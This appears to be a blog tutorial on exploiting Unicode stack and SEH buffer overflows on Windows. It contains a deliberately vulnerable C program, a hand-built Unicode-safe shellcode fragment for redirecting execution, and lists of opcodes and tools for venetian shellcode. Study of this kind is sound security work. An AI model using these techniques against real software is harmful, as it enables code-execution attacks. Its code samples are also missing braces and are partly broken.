EIP = 0×00410041 ?? Exploiting Unicode Buffer Overflows

Hello all =)

I’m writing this post in English (a poor English) because perhaps I will do some references to this article on others sites. But you can download the French version here : Unicode Buffer Overflows Exploitation – French Version.pdf

Introduction :

Maybe you’ve already encountered few problems when trying to exploit a buffer overflow, EIP = 0×00410041 for example while you have entered a string like this one : « AAAA… ». Maybe you don’t, but I think very interesting to understand when can we be confronted to this case and what it is due to.

Understanding Unicode Strings :

First of all I’m going to present you briefly the mechanism of Unicode Strings. Unicode strings have been created to ensure that all the languages can be used from any country without problems of transliteration. For example the Arabic characters are different from our. You understand that this chain مهمءضك cannot be converted according to the ASCII codes we know. With Unicode strings it is possible to use any kind of characters. You can have a great overview of Unicode characters here.

I won’t explain you more about Unicode Strings, I’m now going to show you how to use it.

Using Unicode Strings :

In C, it exists a list of functions to manipulate Unicode Strings on Windows : Unicode Functions.

Let us take a look to the conversion ASCII/Unicode functions :

    • MultiByteToWideChar() : ASCII -> Uniocde :
int MultiByteToWideChar(
UINT CodePage,
DWORD dwFlags,
LPCSTR lpMultiByteStr,
int cbMultiByte,
LPWSTR lpWideCharStr,
int cchWideChar
    • WideCharToMultiByte() : Unicode -> ASCII :
int WideCharToMultiByte(
  UINT CodePage,
  DWORD dwFlags,
  LPCWSTR lpWideCharStr,
  int cchWideChar,
  LPSTR lpMultiByteStr,
  int cbMultiByte,
  LPCSTR lpDefaultChar,
  LPBOOL lpUsedDefaultChar

I call your attention to the field CodePage :

[in] Code page used to perform the conversion.

You can set this parameter to any code page that is installed or available in the system. You can also specify one of the values shown in the following table.

Value Description
CP_ACP ANSI code page
CP_MACCP Not supported
CP_OEMCP OEM code page
CP_SYMBOL Not supported
CP_THREAD_ACP Not supported
CP_UTF7 UTF-7 code page
CP_UTF8 UTF-8 code page

When SYSGEN_LOCUSA is set, only the 1252 and 437 code pages are supported.

To create an image that has very limited locale support, specify the image with SYSGEN_CORELOC and put the necessary locales for the image into Public\Common\Oak\Files\Nlscfg.inf.

When converting an ASCII chain to Unicode, the result will depend of the Code Page used. An example of conversion :

int main(int argc, char *argv[])
  wchar_t wcStr[56];
  char cStr[56];
  memcpy(cStr, "\xB0\x42\x43\x44", 4);
  MultiByteToWideChar(CP_OEMCP, 0, &cStr, 4, &wcStr, SIZE);
  printf("%ws", wcStr);
  return 0;

Here I’m using the OEM code page.

Now let us have a look to the memory :


It seems that each character is followed by a NULL BYTE. In fact « ABCD »=41 42 43 44 becomes « A.B.C.D »=4100 4200 4300 4400.
Actually, characters less than 0×7F will follow this principle. But if you use a character above to 0×7F, it won’t necessarily be the case.
Indeed 0xB0=0×9125 in the OEM code page. You can find a great table of conversion here : Pratical Win32 and Unicode exploitation.
Ok now what about Unicode buffer overflows ?

Redirecting the program flow :

Rewriting the RET address :

This is an example of a program which will crash because of a stack overflow with Unicode strings :

#define SIZE 56
int main(int argc, char *argv[])
  wchar_t wcBofMe[1];
  wchar_t wcStr[SIZE];
  char cStr[SIZE];
  memcpy(cStr, "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41", SIZE);
  MultiByteToWideChar(CP_OEMCP, 0, &cStr, SIZE, &wcStr, SIZE);
  wcscpy(wcBofMe, wcStr); // Will crash
  return 0;

When running this program, it crash and EIP is 0×41004100 :


Well we clearly see that we can overwrite only 2 bytes of the 4 that constitute the EIP register. What is a real problem, it is difficult to find a JMP ESP for example at an address like 0xyy00zz00.

But remember what I said, some bytes (>0×7F) have special translation in Unicode with the OEM code page. For example 0xC0 = 0×1425. So I’ve modified my chain and I obtain :


So it means that we can actually overwrite the 4 bytes of the EIP. There is a plugin for OllyDBG which allow you to find addresses with unicode format (0xyy00zz00) of JMP ESP, CALL ESP, … It is OllyUNI. And another plugin exists for Immunity Debugger :  pvefindaddr.

Seh rewriting :

We know that exists an other method to redirect the program flow : the SEH Overwriting. Well with Unicode string, the principle will be the same (Overwrite SEH Handler address with a pointer to a POP POP RET instruction sequence) but we won’t be able to use a JMP SHORT. Writing a JMP SHORT with Unicode string is almost impossible. And it depend to much of the Code Page used.

So the principle will be to don’t make a JMP SHORT but let the program execute normally the instructions contained in Next SEH and SEH Handler hoping it won’t crash. Then, if this instructions don’t cause any harm, we will be able to execute a shellcode situated after the SEH structure. I know it is a bit difficult to understand so just look at this schema :


For steps 1 and 2 there is no problem.

But the step 3 is more tricky and require two conditions :

      • The address of Next SEH when executed mustn’t cause a harm.
      • Similarly, the address of SEH Handler mustn’t raise an exception when executed.

I give you an example of address which can cause a bug :0×41560020

0020           ADD BYTE PTR DS:[EAX],AH
56             PUSH ESI
41             INC ECX

Here, if EAX contains a value like 0×00000000, an exception « Access violation » is raised when executing


Exploiting Unicode Buffer Overflows :

RET on ASCII shellcode :

When we convert an ASCII string to an Unicode one, it still stay the ASCII string in memory. So if we can jump on it, we will be able to execute a « normal » shellcode.  But how can we make a jump ? As I told you before, it is almost impossible to make a jump with a unicode shellcode…

Well we have to find another solution. I offer you to read this paper dealing with the instructions we can use with unicode constraints : Building IA32 ‘Unicode-Proof’ Shellcodes.

In my case I want to jump to the address 0×0022FD88 which points to my ASCII shellcode.

So I will use this unicode shellcode :

0040139D     B8 00220000    MOV EAX,2200 ; EAX = 00002200
004013A2     50             |PUSH EAX
004013A3     4C             DEC ESP
004013A4     58             POP EAX ; EAX = 002200??
004013A5     05 00FD0000    ADD EAX,0FD00 ; EAX = 0022FD??
004013AF     B0 00          MOV AL,0 ; EAX = 0022FD00
004013AA     B9 00880000    MOV ECX,8800 ; ECX = 00008800
004013B1     00E8           ADD AL,CH ; EAX = 0022FD88
00401284     50            PUSH EAX
00401285     C3            RETN

Well if I can give you some advices, when you have an address like 0xTTUUVVWW, begin by set TT, then UU, … It is really less complicated.

Then  it is important to understand how to « play » with the ESP register and POP/PUSH instructions. Now if you consider my string :

B8 00 22 00 00 50 4C 58 05 00 FD 00 00 B0 00 B9 00 88 00 00 00 E8, you see that there is no null byte between 50 and 4C for example.
Well it is not critical. In fact there are instructions which opcodes look like this : 00 XX 00. In my case I will use :

004013C6     0072 00        ADD BYTE PTR DS:[EDX],DH

So I obtain this shellcode :

0040139D     B8 00220000    MOV EAX,2200 ; EAX = 00002200
004013A2     50             |PUSH EAX
004013C6     0072 00        ADD BYTE PTR DS:[EDX],DH
004013A3     4C             DEC ESP
004013C6     0072 00        ADD BYTE PTR DS:[EDX],DH
004013A4     58             POP EAX ; EAX = 002200??
004013C6     0072 00        ADD BYTE PTR DS:[EDX],DH
004013A5     05 00FD0000    ADD EAX,0FD00 ; EAX = 0022FD??
004013AF     B0 00          MOV AL,0 ; EAX = 0022FD00
004013AA     B9 00880000    MOV ECX,8800 ; ECX = 00008800
004013B1     00E8           ADD AL,CH ; EAX = 0022FD88
004013C6     0072 00        ADD BYTE PTR DS:[EDX],DH
00401284     50            PUSH EAX
004013C6     0072 00        ADD BYTE PTR DS:[EDX],DH
00401285     C3            RETN

Now my string is ok. We just have to build an ASCII shellcode.

Using a decoder :

But imagine the case you can’t return on your ASCII string. You will be obliged to make an unicode shellcode. But writing a shellcode in unicode is too much difficult. Nevertheless it exists a technique based on Venetian Shellcodes. There are some tools like alpha2 which encode an ASCII Shellcode to a Unicode one which will be decoded by a decoder (unicode compatible). After the decoder has been executed we just have to jump on the original shellcode. But this method require one condition :

      • A least one register and it is better two, EAX and ECX for example, have to point one to the encoded shellcode and the other to a writeable memory space. However it is possible with just one register that points to the encoded shellcode which will be modified by itself.

Nonetheless you will ask me why do we need a register which points to the shellcode ?? Well, as I told you, there are few instructions which opcodes looks like this : 00 XX 00. That is instructions we can use. And these instructions are similar to this one I’ve already used :

0072 00        ADD BYTE PTR DS:[EDX],DH

In this case, if EDX points to our shellcode, we are able to modify it via DH.
Here is a little list of instructions of this kind :

CPU Disasm
Address   Hex dump          Command                                  Comments
00401220      0060 00       ADD BYTE PTR DS:[EAX],AH
00401223      0061 00       ADD BYTE PTR DS:[ECX],AH
00401226      0062 00       ADD BYTE PTR DS:[EDX],AH
00401229      0063 00       ADD BYTE PTR DS:[EBX],AH
0040123E      006A 00       ADD BYTE PTR DS:[EDX],CH
00401241      006B 00       ADD BYTE PTR DS:[EBX],CH
00401253      0071 00       ADD BYTE PTR DS:[ECX],DH
00401256      0072 00       ADD BYTE PTR DS:[EDX],DH
00401259      0073 00       ADD BYTE PTR DS:[EBX],DH
00401262      0076 00       ADD BYTE PTR DS:[ESI],DH
00401265      0078 00       ADD BYTE PTR DS:[EAX],BH
00401268      0079 00       ADD BYTE PTR DS:[ECX],BH
0040126B      007A 00       ADD BYTE PTR DS:[EDX],BH
0040126E      007B 00       ADD BYTE PTR DS:[EBX],BH
00401277      007E 00       ADD BYTE PTR DS:[ESI],BH
0040127A      007F 00       ADD BYTE PTR DS:[EDI],BH

These instructions can be very useful when adjusting the unicode shellcode for make a jump to the ascii string (previous method).


I’m sorry to don’t illustrate my talk but I don’t have the time. Maybe I will give you some examples soon in a post.

This article was a very short approach to the Unicode Buffer Overflows, so I will end by offering you an excellent paper about this topic,really more comprehensive : Exploit writing tutorial part 7 : Unicode – from 0×00410041 to calc by Peter Van Eeckhoutte.

Some Unicode Buffer Overflows exploits :

  1. Aucun commentaire pour l'instant

Les commentaires sont fermés